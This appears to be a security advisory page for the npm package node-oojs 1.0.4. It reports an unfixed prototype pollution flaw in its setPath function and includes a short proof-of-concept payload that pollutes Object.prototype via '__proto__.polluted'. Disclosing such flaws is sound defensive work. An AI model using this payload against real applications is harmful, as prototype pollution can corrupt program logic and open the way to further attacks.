node-oojs@1.0.4 vulnerabilities

Object Oriented JavaScript

Direct Vulnerabilities

Known vulnerabilities in the node-oojs package. This does not include vulnerabilities belonging to this package’s dependencies.

How to fix?

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.

Fix for free
VulnerabilityVulnerable Version
  • C
Prototype Pollution

node-oojs is an Object Oriented JavaScript

Affected versions of this package are vulnerable to Prototype Pollution via the setPath function.

POC:

require('node-oojs');
oojs.setPath({'__proto__.polluted':true});
console.log(polluted);

How to fix Prototype Pollution?

There is no fixed version for node-oojs.

*